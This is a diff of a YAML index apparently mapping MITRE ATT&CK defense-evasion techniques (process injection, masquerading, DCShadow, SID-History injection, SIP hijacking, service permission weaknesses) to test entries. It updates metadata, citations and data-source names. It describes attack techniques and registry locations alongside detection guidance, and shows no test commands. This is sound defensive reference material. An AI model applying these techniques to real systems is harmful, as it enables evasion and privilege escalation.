@@ -37737,21 +30228,16 @@ defense-evasion: name: powershell T1055: technique: - id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Process Injection - description: "Adversaries may inject code into processes in order to evade process-based - defenses as well as possibly elevate privileges. Process injection is a method - of executing arbitrary code in the address space of a separate live process. - Running code in the context of another process may allow access to the process's - memory, system/network resources, and possibly elevated privileges. Execution - via process injection may also evade detection from security products since - the execution is masked under a legitimate process. \n\nThere are many different - ways to inject code into a process, many of which abuse legitimate functionalities. - These implementations exist for every major OS but are typically platform - specific. \n\nMore sophisticated samples may perform multiple process injections - to segment modules and further evade detection, utilizing named pipes or other - inter-process communication (IPC) mechanisms as a communication channel. " + created: '2017-05-31T21:30:47.843Z' + modified: '2021-02-09T15:43:50.029Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1055 
@@ -37763,7 +30249,7 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.' 
@@ -37784,20 +30270,36 @@ defense-evasion: description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017. source_name: Microsoft Sysmon v6 May 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:28:45.651Z' - created: '2017-05-31T21:30:47.843Z' - x_mitre_platforms: - - Linux - - macOS - - Windows + description: "Adversaries may inject code into processes in order to evade process-based + defenses as well as possibly elevate privileges. Process injection is a method + of executing arbitrary code in the address space of a separate live process. + Running code in the context of another process may allow access to the process's + memory, system/network resources, and possibly elevated privileges. Execution + via process injection may also evade detection from security products since + the execution is masked under a legitimate process. \n\nThere are many different + ways to inject code into a process, many of which abuse legitimate functionalities. + These implementations exist for every major OS but are typically platform + specific. \n\nMore sophisticated samples may perform multiple process injections + to segment modules and further evade detection, utilizing named pipes or other + inter-process communication (IPC) mechanisms as a communication channel. 
" + name: Process Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_contributors: + - Anastasios Pingios + - Christiaan Beek, @ChristiaanBeek + - Ryan Becwar + x_mitre_data_sources: + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + - 'File: File Metadata' + x_mitre_defense_bypassed: + - Application control + - Anti-virus x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -37806,7 +30308,7 @@ defense-evasion: such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017) + may be used for this technique.(Citation: Elastic Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux 
@@ -37820,21 +30322,10 @@ defense-evasion: to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - API monitoring - - File monitoring - - DLL monitoring - - Process monitoring - - Named Pipes - x_mitre_contributors: - - Anastasios Pingios - - Christiaan Beek, @ChristiaanBeek - - Ryan Becwar - x_mitre_version: '1.1' - x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows identifier: T1055 atomic_tests: - name: Shellcode execution via VBA @@ -37996,8 +30487,8 @@ defense-evasion: - Anti-virus - Application control x_mitre_data_sources: - - System calls - - Process monitoring + - 'Process: OS API Execution' + - 'Process: Process Access' x_mitre_detection: "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection @@ -38044,8 +30535,9 @@ defense-evasion: parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Script: Script Execution' x_mitre_platforms: - Windows identifier: T1216.001 @@ -38111,10 +30603,7 @@ defense-evasion: x_mitre_permissions_required: - Administrator x_mitre_data_sources: - - File monitoring - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture + - 'Firmware: Firmware Modification' atomic_tests: [] T1600.001: technique: 
@@ -38148,7 +30637,7 @@ defense-evasion: modified: '2020-10-21T22:36:22.369Z' created: '2020-10-19T19:03:48.310Z' x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network x_mitre_detection: There is no documented method for defenders to directly identify @@ -38199,23 +30688,11 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-03-30T13:47:29.922Z' + modified: '2021-03-08T10:33:00.985Z' created: '2017-05-31T21:31:18.867Z' x_mitre_deprecated: true x_mitre_is_subtechnique: false - x_mitre_version: '3.0' - x_mitre_data_sources: - - Office 365 account logs - - Azure activity logs - - AWS CloudTrail logs - - Stackdriver logs - - Process monitoring - - Process use of network - - Packet capture - - Network protocol analysis - - File monitoring - - Authentication logs - - Binary file metadata + x_mitre_version: '3.1' x_mitre_defense_bypassed: - Network intrusion detection system - Anti-virus @@ -38228,15 +30705,13 @@ defense-evasion: For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information. x_mitre_platforms: - - Linux - - macOS - Windows - - AWS - - GCP - - Azure + - Azure AD - Office 365 - SaaS - - Azure AD + - IaaS + - Linux + - macOS x_mitre_permissions_required: - User - Administrator @@ -38284,8 +30759,8 @@ defense-evasion: x_mitre_contributors: - Casey Smith x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries 
@@ -38426,10 +30901,10 @@ defense-evasion: x_mitre_contributors: - Casey Smith x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - Loaded DLLs + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' x_mitre_detection: 'Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially @@ -38622,14 +31097,14 @@ defense-evasion: url: https://lolbas-project.github.io/ description: LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020. - - source_name: Endgame Masquerade Ball + - source_name: Elastic Masquerade Ball description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.' url: http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf - - url: https://www.f-secure.com/documents/996508/1030745/CozyDuke + - source_name: F-Secure CozyDuke description: 'F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.' - source_name: F-Secure CozyDuke + url: https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163418/CozyDuke.pdf - source_name: Twitter ItsReallyNick Masquerading Update url: https://twitter.com/ItsReallyNick/status/1055321652777619457 description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. 
@@ -38643,7 +31118,7 @@ defense-evasion: and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: - rename rundll32.exe). (Citation: Endgame Masquerade Ball) An + rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)' @@ -38652,7 +31127,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-02-10T20:03:11.691Z' + modified: '2020-11-23T17:03:38.941Z' created: '2020-02-10T20:03:11.691Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -38661,16 +31136,16 @@ defense-evasion: was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but - may not always be indicative of malicious activity. (Citation: Endgame Masquerade + may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)' x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Binary file metadata + - 'File: File Modification' + - 'Process: Process Metadata' + - 'Command: Command Execution' + - 'File: File Metadata' x_mitre_platforms: - Linux - macOS 
@@ -38918,9 +31393,9 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-17T17:36:24.531Z' + modified: '2021-03-08T10:33:02.128Z' created: '2020-06-16T18:42:20.734Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -38933,16 +31408,13 @@ defense-evasion: is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones. x_mitre_data_sources: - - Stackdriver logs - - GCP audit logs - - Azure activity logs - - AWS CloudTrail logs + - 'Instance: Instance Modification' + - 'Instance: Instance Start' + - 'Instance: Instance Stop' x_mitre_contributors: - Netskope x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] T1036.002: technique: @@ -38983,7 +31455,7 @@ defense-evasion: - macOS - Windows x_mitre_data_sources: - - File monitoring + - 'File: File Metadata' x_mitre_detection: Detection methods should include looking for common formats of RTLO characters within filenames such as \u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools 
@@ -39002,7 +31474,7 @@ defense-evasion: Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide) - This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) + This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) external_references: - source_name: mitre-attack external_id: T1207 @@ -39033,7 +31505,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-19T21:04:12.164Z' + modified: '2021-02-09T15:13:27.670Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: 
@@ -39051,10 +31523,10 @@ defense-evasion: x_mitre_defense_bypassed: - Log analysis x_mitre_data_sources: - - API monitoring - - Authentication logs - - Network protocol analysis - - Packet capture + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Modification' + - 'Network Traffic: Network Traffic Content' + - 'User Account: User Account Authentication' x_mitre_contributors: - Vincent Le Toux x_mitre_version: '2.0' @@ -39219,9 +31691,8 @@ defense-evasion: - Application control by file name or path - Anti-virus x_mitre_data_sources: - - BIOS - - MBR - - System calls + - 'Drive: Drive Modification' + - 'Firmware: Firmware Modification' x_mitre_version: '1.1' identifier: T1014 atomic_tests: @@ -39407,12 +31878,11 @@ defense-evasion: - Janantha Marasinghe - Menachem Shafran, XM Cyber x_mitre_data_sources: - - Packet capture - - Host network interface - - Windows Registry - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'File: File Creation' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: @@ -39451,7 +31921,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:31:42.113Z' + modified: '2021-01-20T18:12:11.843Z' created: '2020-01-23T18:03:46.248Z' x_mitre_platforms: - Windows @@ -39470,10 +31940,9 @@ defense-evasion: - Application control - Anti-virus x_mitre_data_sources: - - DLL monitoring - - Loaded DLLs - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Module: Module Load' x_mitre_contributors: - Casey Smith - Ricardo Dias 
@@ -39705,7 +32174,7 @@ defense-evasion: description: |- Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). - With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028). + With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006). id: attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023 type: attack-pattern kill_chain_phases: 
@@ -39713,7 +32182,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-26T21:49:31.964Z' + modified: '2021-02-09T15:49:58.414Z' created: '2020-02-18T18:34:49.414Z' x_mitre_contributors: - Alain Homewood, Insomnia Security @@ -39728,9 +32197,9 @@ defense-evasion: Monitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory) x_mitre_data_sources: - - Windows event logs - - Authentication logs - - API monitoring + - 'Process: OS API Execution' + - 'User Account: User Account Metadata' + - 'Active Directory: Active Directory Object Modification' x_mitre_platforms: - Windows atomic_tests: [] 
@@ -39785,12 +32254,12 @@ defense-evasion: Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017) - Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017) + Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017) * Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. 
By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file). * Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk. * Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex). 
- * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). + * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017) id: attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc @@ -39798,7 +32267,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:42:26.022Z' + modified: '2021-02-09T15:58:04.719Z' created: '2020-02-05T19:34:04.910Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true 
@@ -39822,18 +32291,13 @@ defense-evasion: * HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust * HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust - **Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017) + **Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017) Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017) x_mitre_data_sources: - - Windows Registry - - API monitoring - - Application logs - - DLL monitoring - - Loaded DLLs - - Process monitoring - - Windows Registry - - Windows event logs + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' x_mitre_contributors: - Matt Graeber, @mattifestation, SpecterOps x_mitre_platforms: 
@@ -39900,33 +32364,14 @@ defense-evasion: - Process whitelisting - Data Execution Prevention - Exploit Prevention - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Process command-line parameters x_mitre_version: '1.0' x_mitre_is_subtechnique: false x_mitre_deprecated: true atomic_tests: [] T1574.010: technique: - external_references: - - source_name: mitre-attack - external_id: T1574.010 - url: https://attack.mitre.org/techniques/T1574/010 - - external_id: CAPEC-17 - source_name: capec - url: https://capec.mitre.org/data/definitions/17.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services File Permissions Weakness - description: |- - Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. - - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. 
- id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd - type: attack-pattern + created: '2020-03-12T20:43:53.998Z' + modified: '2020-09-16T19:10:04.262Z' kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence 
@@ -39934,24 +32379,25 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-16T19:10:04.262Z' - created: '2020-03-12T20:43:53.998Z' - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Services - - File monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_permissions_required: - - Administrator - - User + type: attack-pattern + id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd + description: |- + Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. + + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. 
+ name: Services File Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.010 + url: https://attack.mitre.org/techniques/T1574/010 + - external_id: CAPEC-17 + source_name: capec + url: https://capec.mitre.org/data/definitions/17.html + x_mitre_platforms: + - Windows x_mitre_detection: "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected 
@@ -39960,11 +32406,62 @@ defense-evasion: for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. " - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak atomic_tests: [] T1574.011: technique: + created: '2020-03-13T11:42:14.444Z' + modified: '2020-09-16T19:07:48.590Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c + description: "Adversaries may execute their own malicious payloads by hijacking + the Registry entries used by services. Adversaries may use flaws in the permissions + for registry to redirect from the originally specified executable to one that + they control, in order to launch their own code at Service start. Windows + stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. + The information stored under a service's Registry keys can be manipulated + to modify a service's execution parameters through tools such as the service + controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), + or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys + is controlled through Access Control Lists and permissions. 
(Citation: Registry + Key Security)\n\nIf the permissions for users and groups are not properly + set and allow access to the Registry keys for a service, then adversaries + can change the service binPath/ImagePath to point to a different executable + under their control. When the service starts or is restarted, then the adversary-controlled + program will execute, allowing the adversary to gain persistence and/or privilege + escalation to the account context the service is set to execute under (local/domain + account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also + alter Registry keys associated with service failure parameters (such as FailureCommand) + that may be executed in an elevated context anytime the service fails or is + intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: + Tweet Registry Perms Weakness) " + name: Services Registry Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1574.011 
@@ -39988,66 +32485,31 @@ defense-evasion: url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services Registry Permissions Weakness - description: "Adversaries may execute their own malicious payloads by hijacking - the Registry entries used by services. Adversaries may use flaws in the permissions - for registry to redirect from the originally specified executable to one that - they control, in order to launch their own code at Service start. Windows - stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. - The information stored under a service's Registry keys can be manipulated - to modify a service's execution parameters through tools such as the service - controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), - or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys - is controlled through Access Control Lists and permissions. (Citation: Registry - Key Security)\n\nIf the permissions for users and groups are not properly - set and allow access to the Registry keys for a service, then adversaries - can change the service binPath/ImagePath to point to a different executable - under their control. 
When the service starts or is restarted, then the adversary-controlled - program will execute, allowing the adversary to gain persistence and/or privilege - escalation to the account context the service is set to execute under (local/domain - account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also - alter Registry keys associated with service failure parameters (such as FailureCommand) - that may be executed in an elevated context anytime the service fails or is - intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: - Tweet Registry Perms Weakness) " - id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:07:48.590Z' - created: '2020-03-13T11:42:14.444Z' - x_mitre_defense_bypassed: - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - - User + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + - 'Command: Command Execution' x_mitre_detection: |- Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. - x_mitre_data_sources: - - Windows Registry - - Services - - Process command-line parameters - x_mitre_contributors: - - Travis Smith, Tripwire - - Matthew Demaske, Adaptforward - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + x_mitre_is_subtechnique: true + 